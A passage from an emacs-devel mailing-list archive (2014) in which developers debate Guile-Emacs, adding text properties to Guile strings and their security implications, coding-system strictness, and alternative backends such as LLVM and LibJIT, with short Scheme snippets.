a non-debuggable security nightmare. Tampering with content that Emacs does not know the meaning of, and doing so differently in non-interactive use is a recipe for making Emacs do unexpected things. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-15 14:43 ` David Kastrup @ 2014-10-16 18:12 ` Richard Stallman 0 siblings, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-16 18:12 UTC (permalink / raw) To: David Kastrup Cc: mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] I presented three solutions for handling shell-command-to-string, but I was confusing it with another function which is a command. shell-command-to-string is only used in Lisp programs, and probably those programs will not show that text to a user except in error messages. Perhaps it should always do strict decoding. Can you present a real example of using shell-command-to-string that really needs to do flexible decoding? -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-12 5:54 ` Eli Zaretskii 2014-10-13 3:10 ` Richard Stallman @ 2014-10-13 3:46 ` Richard Stallman 1 sibling, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-13 3:46 UTC (permalink / raw) To: Eli Zaretskii Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > And, of course, when you invoke a program locally, there's usually no > protocol at all involved. > > Likewise, we need to look at some real cases. Not sure what you mean by that. M-! and M-| is what I had in mind. This may be a big miscommunication. I think the people who want strict encoding are talking about network communication using open-network-stream. But it would be good if they presented some examples to make it clear what cases they are talking about. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 10:50 ` Stephen J. Turnbull 2014-10-09 11:06 ` David Kastrup @ 2014-10-09 11:27 ` Eli Zaretskii 1 sibling, 0 replies; 404+ messages in thread From: Eli Zaretskii @ 2014-10-09 11:27 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, rms, handa, mhw, dmantipov, emacs-devel, mikegerwitz, monnier > From: "Stephen J. Turnbull" <stephen@xemacs.org> > Cc: Mike Gerwitz <mikegerwitz@gnu.org>, > dak@gnu.org, > rms@gnu.org, > mhw@netris.org, > dmantipov@yandex.ru, > emacs-devel@gnu.org, > handa@gnu.org, > monnier@iro.umontreal.ca > Date: Thu, 09 Oct 2014 19:50:37 +0900 > > In the case of Emacs coding systems, it's as simple as choosing to > name the conformant coding system 'utf-8, and the non-conformant one > 'utf-8-with-rawbytes. We already tried something akin to that, and the users almost unanimously wanted Emacs to opt-in by default. > Why does this excite such <adjective deleted> opposition? Because we've been-there-done-that, and have enough gray hair to prove that what you are asking will be met with staunch user opposition. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 4:49 ` Mike Gerwitz 2014-10-09 8:00 ` Eli Zaretskii @ 2014-10-10 14:23 ` Richard Stallman 1 sibling, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-10 14:23 UTC (permalink / raw) To: Mike Gerwitz Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen, eliz [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > *sigh* Be unconcerned. The world is a *lot* more hostile today than > it was in the days when you posted your passwords on the 'net. Agreed. Character encoding attacks are also something that has been exploited "in the wild". Some examples include: You're talking about character encoding, but the message you responded to was about whether to put text properties in GUILE strings. The two issues are unrelated. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-09 3:56 ` Stephen J. Turnbull 2014-10-09 4:49 ` Mike Gerwitz @ 2014-10-10 14:23 ` Richard Stallman 1 sibling, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-10 14:23 UTC (permalink / raw) To: Stephen J. Turnbull Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, eliz [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > you need to show it is real security and really does a useful job. I suspect I can't give you a convincing example, because I haven't studied the Guile modules "at risk", Someone else is welcome to convince me, too. It seems to me that what your argument must be false. You're saying that module A could pass data to module C through properties in a string passed through module B. Yes, it could. But module A could put the same data in a global variable and C could read it there. So where is the "security"? Or how about the recent bash lossage? s-expressions are just Lisp data, and could be placed in a property. These two cases are different in their essential structure. The Bash case involves a browser that sends data thru Apache to trick Bash, with both Apache and Bash being honest. To do this, it has to fiddle with data that Bash will look at for some legitimate purpose. In this case, we have to suppose that A and C are BOTH malicious, and the question is whether B can (as a security measure) prevent them from communicating. I challenge people to demonstrate that Guile provides some real security against such communication, in the absence of text properties in strings. If you can't, then pipe down and leave this to someone else who can. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-05 21:49 ` Richard Stallman 2014-10-06 3:34 ` Stephen J. Turnbull @ 2014-10-10 20:41 ` Mark H Weaver 2014-10-10 21:56 ` Christopher Allan Webber 2014-10-11 1:17 ` Richard Stallman 1 sibling, 2 replies; 404+ messages in thread From: Mark H Weaver @ 2014-10-10 20:41 UTC (permalink / raw) To: Richard Stallman Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen Richard Stallman <rms@gnu.org> writes: > Supporting property lists in Scheme raises difficult questions > > Do you mean text properties in strings, as in Emacs Lisp? Yes. Having mulled it over, I've come to the conclusion that we can add text properties to Guile strings without adding new security risks to competently written Scheme code, with the following caveat: text properties must be invisible to all existing Scheme procedures, including 'equal?' and 'write'. However, as an exception to the caveat above, I think we can allow existing Scheme string operations such as 'substring' and 'string-append' to propagate the text properties. If you'd like to learn how I came to these conclusions, continue reading, otherwise you can stop here. * * * Guile already supports weak-key (eq) hash tables, upon which we've trivially implemented something called "object-properties": (define my-property (make-object-property)) (set! (my-property <obj>) 'foo) (my-property <obj>) => foo Effectively, this allows anyone to add a new private field to any object. The new field is invisible to anything that doesn't know about the object property, including equality predicates and all other standard procedures. So we could use object-properties to add text properties to Guile strings. Therefore, we can regard it as a mere efficiency hack to add a new field to our string objects, as long as the semantics are the same as if the new field was an object-property. However, this still leaves open the question of whether *propagating* these text properties to newly-allocated strings (by 'substring', 'string-append', etc) adds new risks. This next step makes me a bit uneasy, but I think it will also be okay, because standard Scheme does not require 'eq?' to be usable on characters, i.e. it does not require characters to be immediates or even interned. This means that we could, in principle, use object-properties to associate text properties with the characters themselves, instead of with the string objects. This would quite naturally lead to them being copied by string operations such as 'substring' and 'string-append'. Therefore, it seems to me that adding text properties to Guile strings does not add any security issues that are not already present in standard Scheme. What do you think? Mark ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-10 20:41 ` Mark H Weaver @ 2014-10-10 21:56 ` Christopher Allan Webber 2014-10-10 22:56 ` Drew Adams 2014-10-11 1:17 ` Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: Christopher Allan Webber @ 2014-10-10 21:56 UTC (permalink / raw) To: Mark H Weaver Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa, monnier, eliz, stephen Mark H Weaver writes: > Richard Stallman <rms@gnu.org> writes: > >> Supporting property lists in Scheme raises difficult questions >> >> Do you mean text properties in strings, as in Emacs Lisp? > > Yes. > > Having mulled it over, I've come to the conclusion that we can add text > properties to Guile strings without adding new security risks to > competently written Scheme code, with the following caveat: text > properties must be invisible to all existing Scheme procedures, > including 'equal?' and 'write'. > > However, as an exception to the caveat above, I think we can allow > existing Scheme string operations such as 'substring' and > 'string-append' to propagate the text properties. > > If you'd like to learn how I came to these conclusions, continue > reading, otherwise you can stop here. > > * * * > > Guile already supports weak-key (eq) hash tables, upon which we've > trivially implemented something called "object-properties": > > (define my-property (make-object-property)) > (set! (my-property <obj>) 'foo) > (my-property <obj>) => foo > > Effectively, this allows anyone to add a new private field to any > object. The new field is invisible to anything that doesn't know about > the object property, including equality predicates and all other > standard procedures. > > So we could use object-properties to add text properties to Guile > strings. Therefore, we can regard it as a mere efficiency hack to add a > new field to our string objects, as long as the semantics are the same > as if the new field was an object-property. > > However, this still leaves open the question of whether *propagating* > these text properties to newly-allocated strings (by 'substring', > 'string-append', etc) adds new risks. > > This next step makes me a bit uneasy, but I think it will also be okay, > because standard Scheme does not require 'eq?' to be usable on > characters, i.e. it does not require characters to be immediates or even > interned. > > This means that we could, in principle, use object-properties to > associate text properties with the characters themselves, instead of > with the string objects. This would quite naturally lead to them being > copied by string operations such as 'substring' and 'string-append'. > > Therefore, it seems to me that adding text properties to Guile strings > does not add any security issues that are not already present in > standard Scheme. > > What do you think? > > Mark It sounds, if I am reading this right, that the mechanism by which properties are being added to scheme strings means that no actual changes need to be made to Guile strings' datastructures. If true, that sounds like a very efficient and ideal solution because it is so generic. In fact, I gave it a whirl... you mean something like this? (define elisp-properties (make-object-property)) (define (elisp-propertize string . args) (let ((copied-string (string-copy string))) (set! (elisp-properties copied-string) args) copied-string)) (define my-monkey (elisp-propertize "monkey" 'eats 'bananas)) ;; => "monkey" (elisp-properties my-monkey) ;; => (eats bananas) That's awesome! And it doesn't feel like we're changing Guile in any core way just to accomodate elisp, and it seems bidirectionally compatible... But as for copying around property lists when copying strings, making substrings, etc, I think I'm more uncomfortable with that idea using default Guile methods. That seems like changing the language in a substantial way that may even have strange performance issues or unexpected side effects... would we do such a thing if this were anything other than Emacs? Would we do it for Javascript? But it doesn't seem to me like we need to worry: why not just add a library like this: (use-module (language elisp string-tools)) (elisp-substring (elisp-propertize "monkeys" 'eat 'bananas) 3 6) ;; => this would return "key", but with object properties of ;; (eat bananas) (elisp-substring "monkeys" 3 6) ;; => this would return "key", but with no object properties (elisp-substring (elisp-propertize "monkeys" 'eat 'bananas) 3 6) ;; => this would return "key" with no object properties The version of substring provided in emacs lisp would of course be elisp-substring, and strings would work between guile and emacs, but as for copying around strings with properties, only functions in guile which care about this would have to deal with it and deal with any related concerns. - Chris ^ permalink raw reply [flat|nested] 404+ messages in thread
* RE: Emacs Lisp's future 2014-10-10 21:56 ` Christopher Allan Webber @ 2014-10-10 22:56 ` Drew Adams 0 siblings, 0 replies; 404+ messages in thread From: Drew Adams @ 2014-10-10 22:56 UTC (permalink / raw) To: Christopher Allan Webber, Mark H Weaver Cc: dak, Richard Stallman, dmantipov, emacs-devel, handa, monnier, eliz, stephen > > Richard Stallman <rms@gnu.org> writes: > >> Do you mean text properties in strings, as in Emacs Lisp? > > Yes. > > > > Having mulled it over, I've come to the conclusion that we can add > > text properties to Guile strings...with the following caveat: text > > properties must be invisible to all existing Scheme procedures, > > including 'equal?' and 'write'.... > > > > we could, in principle, use object-properties to associate text > > properties with the characters themselves, instead of with the > > string objects. This would quite naturally lead to them being > > copied by string operations such as 'substring' and 'string- > > append'. > > ...you mean something like this? > (define elisp-properties (make-object-property)) > (define (elisp-propertize string . args) > (let ((copied-string (string-copy string))) > (set! (elisp-properties copied-string) args) > copied-string)) > (define my-monkey (elisp-propertize "monkey" 'eats 'bananas)) > (elisp-properties my-monkey) ;; => (eats bananas) How would this relate to a future Guile implementation of Emacs-Lisp text (and overlay) properties, whose values can be arbitrary Emacs-Lisp thingies? I know this question jumps the gun, but can we assume that if an Emacs user puts an arbitrary Lisp thing (e.g., a particular cons) on some text as a text-property value that that will carry through to the Scheme implementation in such a way that s?he can still manipulate the data of that value (e.g. modify the particular cons cell components)? IOW, will an Emacs user have the same abilities, and see the same behavior, wrt text and overlay properties as s?he has and sees now with Emacs Lisp? ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-10-10 20:41 ` Mark H Weaver 2014-10-10 21:56 ` Christopher Allan Webber @ 2014-10-11 1:17 ` Richard Stallman 1 sibling, 0 replies; 404+ messages in thread From: Richard Stallman @ 2014-10-11 1:17 UTC (permalink / raw) To: Mark H Weaver; +Cc: dak, dmantipov, emacs-devel, handa, monnier, eliz, stephen [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] Having mulled it over, I've come to the conclusion that we can add text properties to Guile strings without adding new security risks to competently written Scheme code, with the following caveat: text properties must be invisible to all existing Scheme procedures, including 'equal?' and 'write'. That makes sense to me. However, as an exception to the caveat above, I think we can allow existing Scheme string operations such as 'substring' and 'string-append' to propagate the text properties. I agree, that's safe. If the text property values have no effect on the results of proper Scheme code, then whatever values Scheme primitives put in the text properties, they can't hurt anything. The reason why it is important to implement these at the lowest possible level is efficiency. If every string in Emacs had to be a higher-level abstract object, they would surely be slower. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 14:24 ` David Kastrup 2014-09-27 15:24 ` Stefan Monnier @ 2014-09-27 17:04 ` Taylan Ulrich Bayirli/Kammer 2014-09-27 19:33 ` Robin Templeton 2 siblings, 0 replies; 404+ messages in thread From: Taylan Ulrich Bayirli/Kammer @ 2014-09-27 17:04 UTC (permalink / raw) To: David Kastrup Cc: dmantipov, emacs-devel, handa, Stefan Monnier, Eli Zaretskii, stephen David Kastrup <dak@gnu.org> writes: > The GUILE bridge is there. Robin Templeton's status of the port is > that it is mostly complete, with strings/buffers being the most > notable part obliterating acceptable performance via thick glue layers > between Emacs' and GUILE's different implementations of similar > concepts. > > Removing the thick glue layer requires that Emacs and GUILE strings > (and Emacs buffers and GUILE whatever) become exchangeable and offer > the same operations without impacting performance for either. Guile supports extra/foreign types just fine (so-called SMOBs), which is what strings and buffers are in Guile-Emacs so far, and if I understood Robin right then the intention is to keep them so for a while, probably even in the first "release" of Guile-Emacs. SMOB types don't cause any extra memory usage or data access time AFAIK so that probably works fine, the only problem being that Scheme and Elisp strings are two different data types. You get all of the other benefits on the meanwhile which don't involve the mixing of Scheme and Elisp code. Taylan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 14:24 ` David Kastrup 2014-09-27 15:24 ` Stefan Monnier 2014-09-27 17:04 ` Taylan Ulrich Bayirli/Kammer @ 2014-09-27 19:33 ` Robin Templeton 2014-09-28 7:17 ` David Kastrup 2 siblings, 1 reply; 404+ messages in thread From: Robin Templeton @ 2014-09-27 19:33 UTC (permalink / raw) To: emacs-devel David Kastrup <dak@gnu.org> writes: > The GUILE bridge is there. Robin Templeton's status of the port is that > it is mostly complete, with strings/buffers being the most notable part > obliterating acceptable performance via thick glue layers between Emacs' > and GUILE's different implementations of similar concepts. Unifying the Elisp and Scheme string types is important, but more of a long-term goal to allow convenient and efficient interaction between the languages. Guile-Emacs's performance problems are mostly unrelated to string handling. Elisp string representation is unchanged from standard Emacs, except for trivial changes to make them an application-defined Guile type. -- Inteligenta persono lernas la lingvon Esperanton rapide kaj facile. Esperanto estas moderna, kultura lingvo por la mondo. Simpla, fleksebla, belsona, Esperanto estas la praktika solvo de la problemo de universala interkompreno. Lernu la interlingvon Esperanton! ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 19:33 ` Robin Templeton @ 2014-09-28 7:17 ` David Kastrup 0 siblings, 0 replies; 404+ messages in thread From: David Kastrup @ 2014-09-28 7:17 UTC (permalink / raw) To: emacs-devel Robin Templeton <robin@terpri.org> writes: > David Kastrup <dak@gnu.org> writes: > >> The GUILE bridge is there. Robin Templeton's status of the port is that >> it is mostly complete, with strings/buffers being the most notable part >> obliterating acceptable performance via thick glue layers between Emacs' >> and GUILE's different implementations of similar concepts. > > Unifying the Elisp and Scheme string types is important, but more of a > long-term goal to allow convenient and efficient interaction between the > languages. Guile-Emacs's performance problems are mostly unrelated to > string handling. Elisp string representation is unchanged from standard > Emacs, except for trivial changes to make them an application-defined > Guile type. Ok, this is different _currently_ from the situation we have in LilyPond where string interaction between C++, LilyPond, and GUILE was already ubiquitous when GUILE 2.0 started supporting Unicode in its strings. Emacs has strategies and conventions for passing strings between C (literals, but also I/O and stuff) and Elisp reasonably cheaply whenever cheap is an option. When it is running on a GUILE VM, I don't see that it will get by without addressing similar questions regarding the GUILE domain. Though to be honest: the typical Emacs programmer is not usually exposed to the details of byte code in any way either. -- David Kastrup ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 11:13 ` David Kastrup 2014-09-27 12:00 ` Eli Zaretskii @ 2014-09-27 15:34 ` Stephen J. Turnbull 1 sibling, 0 replies; 404+ messages in thread From: Stephen J. Turnbull @ 2014-09-27 15:34 UTC (permalink / raw) To: David Kastrup; +Cc: Kenichi Handa, Eli Zaretskii, dmantipov, emacs-devel David Kastrup writes: > In short, it is not likely we are talking about a no-brainer regarding > rebasing MULE on something else. If we were, it would appear to me that > XEmacs would have had more to gain from such a step than Emacs, and > there is likely some reason that they chose not to do so. The reason for using Mule code in XEmacs in the first place was that by the time anybody who understood multilingual processing because they suffered from from it, Sun had already awarded the contract to Ben et al and it was a done deal. Since then, we haven't fixed it because I'm at best slow and mistake-prone as a programmer, and nobody else really cares. Believe me, I *want* to do it. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-27 9:32 ` Eli Zaretskii 2014-09-27 10:37 ` Stephen J. Turnbull @ 2014-09-29 13:17 ` K. Handa 1 sibling, 0 replies; 404+ messages in thread From: K. Handa @ 2014-09-29 13:17 UTC (permalink / raw) To: Eli Zaretskii; +Cc: stephen, dmantipov, dak, emacs-devel In article <837g0ptnlj.fsf@gnu.org>, Eli Zaretskii <eliz@gnu.org> writes: > > No, you don't. There's plenty of private space for those purposes > > (unless you know of private character sets that use more than two > > whole planes?) > I take it that you have studied the charsets for which we use > codepoints above 0x10FFFF, and concluded that they all fit in the > 2*64K+6.4K PUA space provided by Unicode? We have several quite large > character sets which need that (grep mule-conf.el for ":unify-map" to > see the list, and see etc/charsets/ for the map files). I'm not sure > the PUA space is large enough, but I didn't sum all the numbers. > In any case, the question why we don't use PUA for this is best > addressed to Handa-san (CC'ed). The biggest character set is GB18030 which includes the whole Unicode characters (including PUA) plus several its own PUAs. So, the Unicode character code points are simply not enough to support the full GB18030. In addition, almost all 2-byte CJK character sets contain their own PUAs. As Emacs doesn't unify characters in those PUAs with Unicode' PUA characters, we can handle multiple those character sets at the same time. --- Kenichi Handa handa@gnu.org ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future (was: Guile emacs thread (again)) @ 2014-09-17 2:57 Lally Singh 2014-09-17 11:01 ` Tom 2014-09-17 11:43 ` Emacs Lisp's future (was: Guile emacs thread (again)) Richard Stallman 0 siblings, 2 replies; 404+ messages in thread From: Lally Singh @ 2014-09-17 2:57 UTC (permalink / raw) To: emacs-devel [-- Attachment #1: Type: text/plain, Size: 447 bytes --] So if this a runtime system issue, what about elisp on LLVM? Let the LLVM project handle the backend and performance issues, and emacs can maintain one language frontend. There are plenty of people working on that, so emacs can ride that for almost free. I'm assuming that there are reasons why it doesn't work, as someone (apparently) did the work some time ago: https://github.com/boostpro/emacs-llvm-jit Perhaps it just needs a little TLC? [-- Attachment #2: Type: text/html, Size: 577 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future (was: Guile emacs thread (again)) 2014-09-17 2:57 Emacs Lisp's future (was: Guile emacs thread (again)) Lally Singh @ 2014-09-17 11:01 ` Tom 2014-09-17 12:28 ` Emacs Lisp's future Stefan Monnier 2014-09-17 11:43 ` Emacs Lisp's future (was: Guile emacs thread (again)) Richard Stallman 1 sibling, 1 reply; 404+ messages in thread From: Tom @ 2014-09-17 11:01 UTC (permalink / raw) To: emacs-devel Lally Singh <lally.singh <at> gmail.com> writes: > > So if this a runtime system issue, what about elisp on LLVM? Let the LLVM project handle the backend and performance issues, and emacs can maintain one language frontend. There are plenty of people working on that, so emacs can ride that for almost free. In the long run this would be the most practical solution. Choosing a well supported and widely used VM which gets tons of developer attention, so the VM development would be taken care of, and Elisp could be implemented as a frontend. This approach has the advantage of supporting the existing Elisp code base and it would also make it possible to use other languages to extend emacs, because widdely used VMs have frontend implementations for many modern languages (Python, etc.) ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 11:01 ` Tom @ 2014-09-17 12:28 ` Stefan Monnier 2014-09-17 12:58 ` Tom 0 siblings, 1 reply; 404+ messages in thread From: Stefan Monnier @ 2014-09-17 12:28 UTC (permalink / raw) To: Tom; +Cc: emacs-devel > base and it would also make it possible to use other languages to extend > Emacs, because widdely used VMs have frontend implementations for > many modern languages (Python, etc.) As mentioned in my previous message about Guile-Emacs, I tend to think this would be a liability rather than a feature. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 12:28 ` Emacs Lisp's future Stefan Monnier @ 2014-09-17 12:58 ` Tom 2014-09-17 13:39 ` Óscar Fuentes 0 siblings, 1 reply; 404+ messages in thread From: Tom @ 2014-09-17 12:58 UTC (permalink / raw) To: emacs-devel Stefan Monnier <monnier <at> iro.umontreal.ca> writes: > > As mentioned in my previous message about Guile-Emacs, I tend to think > this would be a liability rather than a feature. > I don't see why. It would make it easier for people to write configurations for emacs if they can use a language which they already know and is widely used. You could still set up a rule that you only accept elisp packages in the core if it makes core maintenance easier. But why deny this feature from the users if a popular VM can easily support it? It would be a great selling point if you could say "you can use your favorite language to configure emacs, you don't have to use arcane elisp if you don't want to". It could be an additional convenience for the users which would make emacs more accesible than it is today. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 12:58 ` Tom @ 2014-09-17 13:39 ` Óscar Fuentes 2014-09-17 14:15 ` Tom 0 siblings, 1 reply; 404+ messages in thread From: Óscar Fuentes @ 2014-09-17 13:39 UTC (permalink / raw) To: emacs-devel Tom <adatgyujto@gmail.com> writes: > Stefan Monnier <monnier <at> iro.umontreal.ca> writes: > >> >> As mentioned in my previous message about Guile-Emacs, I tend to think >> this would be a liability rather than a feature. >> > > I don't see why. It would make it easier for people to write > configurations for emacs if they can use a language which they already > know and is widely used. > > You could still set up a rule that you only accept elisp packages > in the core if it makes core maintenance easier. But why deny > this feature from the users if a popular VM can easily support it? > > It would be a great selling point if you could say "you can use > your favorite language to configure emacs, you don't have to use > arcane elisp if you don't want to". It could be an additional > convenience for the users which would make emacs more accesible > than it is today. LLVM is not a VM (Virtual Machine). I know, the name is confusing. So LLVM will not allow using multiple programming languages to configure Emacs. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 13:39 ` Óscar Fuentes @ 2014-09-17 14:15 ` Tom 0 siblings, 0 replies; 404+ messages in thread From: Tom @ 2014-09-17 14:15 UTC (permalink / raw) To: emacs-devel Óscar Fuentes <ofv <at> wanadoo.es> writes: > > LLVM is not a VM (Virtual Machine). I know, the name is confusing. > > So LLVM will not allow using multiple programming languages to configure > Emacs. > I didn't talk about LLVM specifically, I used the word VM in general. There are VMs where this is possible, the question is: is there a sufficiently popular one (considerable developer community, supports multiple modern languages, etc.) which is GPL compatible? ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future (was: Guile emacs thread (again)) 2014-09-17 2:57 Emacs Lisp's future (was: Guile emacs thread (again)) Lally Singh 2014-09-17 11:01 ` Tom @ 2014-09-17 11:43 ` Richard Stallman 2014-09-17 14:21 ` Lally Singh 1 sibling, 1 reply; 404+ messages in thread From: Richard Stallman @ 2014-09-17 11:43 UTC (permalink / raw) To: Lally Singh; +Cc: emacs-devel [[[ To any NSA and FBI agents reading my email: please consider ]]] [[[ whether defending the US Constitution against all enemies, ]]] [[[ foreign or domestic, requires you to follow Snowden's example. ]]] It is not acceptable to base a GNU package on LLVM. It is a non-copylefted competitor to an important GNU package. -- Dr Richard Stallman President, Free Software Foundation 51 Franklin St Boston MA 02110 USA www.fsf.org www.gnu.org Skype: No way! That's nonfree (freedom-denying) software. Use Ekiga or an ordinary phone call. ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future (was: Guile emacs thread (again)) 2014-09-17 11:43 ` Emacs Lisp's future (was: Guile emacs thread (again)) Richard Stallman @ 2014-09-17 14:21 ` Lally Singh 2014-09-17 15:04 ` Emacs Lisp's future Stefan Monnier 0 siblings, 1 reply; 404+ messages in thread From: Lally Singh @ 2014-09-17 14:21 UTC (permalink / raw) To: rms; +Cc: emacs-devel [-- Attachment #1: Type: text/plain, Size: 1431 bytes --] Would DotGNU work? Ignore C# and put in a elisp frontend. The benefit being that we can watch what the larger efforts are doing in those fronts, and pick-and-choose the good ideas with little effort on our side. DotGNU would get a boost of support from emacs, and it's a familiar enough environment that a lot of programmers would be willing to go in and hack on it. They'd often already have transferrable experience on the proprietary versions of DotGNU, but would be able to vent their innate need to hack on dotgnu instead of the more proprietary versions. Emacs has a huge user footprint, and leveraging it to boost another project would help. Especially a project that rides rather close to a very popular proprietary platform - that's a lot of hackers to harness. On Wed, Sep 17, 2014 at 7:43 AM, Richard Stallman <rms@gnu.org> wrote: > [[[ To any NSA and FBI agents reading my email: please consider ]]] > [[[ whether defending the US Constitution against all enemies, ]]] > [[[ foreign or domestic, requires you to follow Snowden's example. ]]] > > It is not acceptable to base a GNU package on LLVM. It is a > non-copylefted competitor to an important GNU package. > > -- > Dr Richard Stallman > President, Free Software Foundation > 51 Franklin St > Boston MA 02110 > USA > www.fsf.org www.gnu.org > Skype: No way! That's nonfree (freedom-denying) software. > Use Ekiga or an ordinary phone call. > > [-- Attachment #2: Type: text/html, Size: 1981 bytes --] ^ permalink raw reply [flat|nested] 404+ messages in thread
* Re: Emacs Lisp's future 2014-09-17 14:21 ` Lally Singh @ 2014-09-17 15:04 ` Stefan Monnier 0 siblings, 0 replies; 404+ messages in thread From: Stefan Monnier @ 2014-09-17 15:04 UTC (permalink / raw) To: Lally Singh; +Cc: rms, emacs-devel > Would DotGNU work? DotGNU is dead. But there's still LibJIT. I have no idea in what kind of shape it is, tho. Stefan ^ permalink raw reply [flat|nested] 404+ messages in thread
* Guile emacs thread (again) @ 2014-09-11 16:29 Christopher Allan Webber 2014-09-16 15:50 ` Emacs Lisp's future (was: Guile emacs thread (again)) Stefan Monnier 0 siblings, 1 reply; 404+ messages in thread From: Christopher Allan Webber @ 2014-09-11 16:29 UTC (permalink / raw) To: emacs-devel Hello! It's been a while since the topic has come up on this list, but many of us are interested in it, and maybe some developers don't know, and I hadn't seen any conversations on the list despite recent progress. Anyway, it seems that BT Templeton's emacs on guile project this summer has gone fairly well, and it looks like almost everything runs. See: http://www.emacswiki.org/emacs/GuileEmacs I remember reading Andy Wingo's email about this a few years ago, "guile and emacs and elisp, oh my!": https://lists.gnu.org/archive/html/emacs-devel/2010-04/msg00665.html I found it very inspiring. It seems those things are fairly close. So this email is partly a: - What now? What's the chance of work towards guilemacs moving over to an official emacs git branch, and that port happening, anytime soon? - Is anyone running it? How's it going for you? (I'm mid-compile of the guile wip branch right now...!) - Chris ^ permalink raw reply [flat|nested] 404+ messages in thread
* Emacs Lisp's future (was: Guile emacs thread (again)) 2014-09-11 16:29 Guile emacs thread (again) Christopher Allan Webber @ 2014-09-16 15:50 ` Stefan Monnier 2014-09-16 16:03 ` Lennart Borgman ` (8 more replies) 0 siblings, 9 replies; 404+ messages in thread From: Stefan Monnier @ 2014-09-16 15:50 UTC (permalink / raw) To: Christopher Allan Webber; +Cc: emacs-devel > So this email is partly a: > - What now? What's the chance of work towards guilemacs moving over to > an official emacs git branch, and that port happening, anytime soon? > - Is anyone running it? How's it going for you? Good questions. I've had the opportunity to think a bit more about Emacs Lisp and its possible evolution and I'm still not sure what to think about it. I see a few different options for Emacs Lisp. First, of course we can keep on evolving Elisp on its own. This has worked OK for the last 30 years, so it's not such a terrible choice. The main problems I see with that: - Elisp is slow and as CPUs aren't getting faster, its slowness makes itself noticed more often. - Lack of some features, most notably FFI and concurrency. - Lack of manpower. This last point is for me the strongest motivation to try and move to some other system, where we could use other people's work. One such option is Guile-Emacs. This presumably would give us a faster implementation (at least in theory, their bytecode is significantly more efficient), would give us an FFI, and would give us more manpower since we'd be benefiting from the work done on Guile. Note that while Guile does come with support for threading, it doesn't immediately let us use concurrency in Guile-Emacs, because of all the issues of synchronizing access to shared data, with all the existing Emacs code (both C and Elisp) assuming that this problem doesn't exist. IOW, language support for concurrency is just a first step on the way to letting Emacs Lisp use concurrency. Another detail that needs to be spelled out is the difference between the language and its implementation. Guile-Emacs provides 2 languages: Emacs Lips and Scheme (well, it also provides a few more, but that's not important). Many people are thinking "cool, so I'll be able to write 